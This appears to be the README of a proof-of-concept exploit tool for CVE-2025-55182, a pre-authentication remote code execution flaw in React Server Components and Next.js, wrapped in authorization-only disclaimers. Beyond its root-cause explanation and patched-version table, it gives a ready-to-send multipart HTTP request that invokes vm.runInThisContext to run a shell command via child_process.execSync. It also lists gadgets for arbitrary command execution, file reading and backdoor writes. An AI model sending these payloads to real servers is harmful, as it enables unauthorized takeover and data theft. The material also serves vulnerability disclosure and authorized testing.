
Unified Security Research Tool
Security Research by schema.cx
"Control is an illusion. It's the systems we build that control us—unless we understand them first."
THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY
STOP. READ THIS BEFORE PROCEEDING.
This repository contains proof-of-concept code for a critical security vulnerability. By accessing, downloading, or using any materials in this repository, you acknowledge and agree to the following:
Written Authorization Required: You MUST have explicit, written permission from the system owner before conducting any security testing. Verbal agreements are insufficient.
Scope Limitations: Testing must be confined to systems explicitly listed in your authorization. "Scope creep" is not permitted.
Applicable Laws: Unauthorized access to computer systems violates:
THE AUTHORS AND CONTRIBUTORS OF THIS REPOSITORY:
"The question isn't whether we can exploit the vulnerability. It's whether we should, and for what purpose."
CVE-2025-55182 is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components in React 19.x and Next.js 15.x-16.x applications.
This vulnerability allows any unauthenticated attacker with network access to a vulnerable application to execute arbitrary commands on the server. The attack requires no credentials, no user interaction, and can be fully automated. Successful exploitation leads to:
| Metric | Rating |
|---|---|
| CVSS v3.1 Base Score | 10.0 CRITICAL |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Impact (C/I/A) | High / High / High |
"People trust systems because they don't understand them. That trust is a vulnerability."
The vulnerability exists in React's Flight protocol implementation within the requireModule function. This function uses bracket notation to access module exports based on user-controlled input, without validating that the requested property is an own property of the module.
Vulnerable Code Location:
react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js
Function: requireModule (approximately line 2546-2558 in v19.0.0)
Vulnerable Pattern:
function requireModule(metadata) {
var moduleExports = __webpack_require__(metadata[0]);
// ... async handling ...
return moduleExports[metadata[2]]; // ← VULNERABLE: No hasOwnProperty check
}
The attack leverages JavaScript's prototype chain traversal:
$ACTION_0:0 field contains JSON with attacker-controlled id (module#export format) and bound (arguments) propertiesconstructor or accessing prototype properties, attackers can reference built-in Node.js modulesvm.runInThisContext, child_process.execSync, or fs.readFileSync execute with attacker-supplied argumentsHTTP POST /formaction
↓
decodeAction(formData, serverManifest)
↓
loadServerReference(manifest, value.id, value.bound)
↓
resolveServerReference(config, id) // Parses "module#export" format
↓
requireModule(metadata)
↓
moduleExports[metadata[2]] // Prototype chain access → RCE
POST /api/action HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"
------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"vm#runInThisContext","bound":["require('child_process').execSync('whoami').toString()"]}
------Boundary--
| Gadget | Module | Description | Impact |
|---|---|---|---|
vm#runInThisContext | vm | Execute JS in current context | Direct RCE |
vm#runInNewContext | vm | Execute JS in sandbox (escapable) | Direct RCE |
child_process#execSync | child_process | Execute shell commands | Direct RCE |
child_process#spawnSync | child_process | Spawn processes | Direct RCE |
fs#readFileSync | fs | Read arbitrary files | Data Exfiltration |
fs#writeFileSync | fs | Write arbitrary files | Persistence/Backdoor |
module#_load | module | Load JS modules (2-step RCE) | Indirect RCE |
"Every system has a door. The question is whether you built the lock yourself—or inherited it from someone who never expected visitors."
| Product | Vulnerable Versions | Patched Versions |
|---|---|---|
| React | 19.0.0, 19.1.0, 19.1.1, 19.2.0 | 19.0.1+, 19.1.2+, 19.2.1+ |
| Next.js | 15.x, 16.x (using vulnerable React) | Versions with patched React |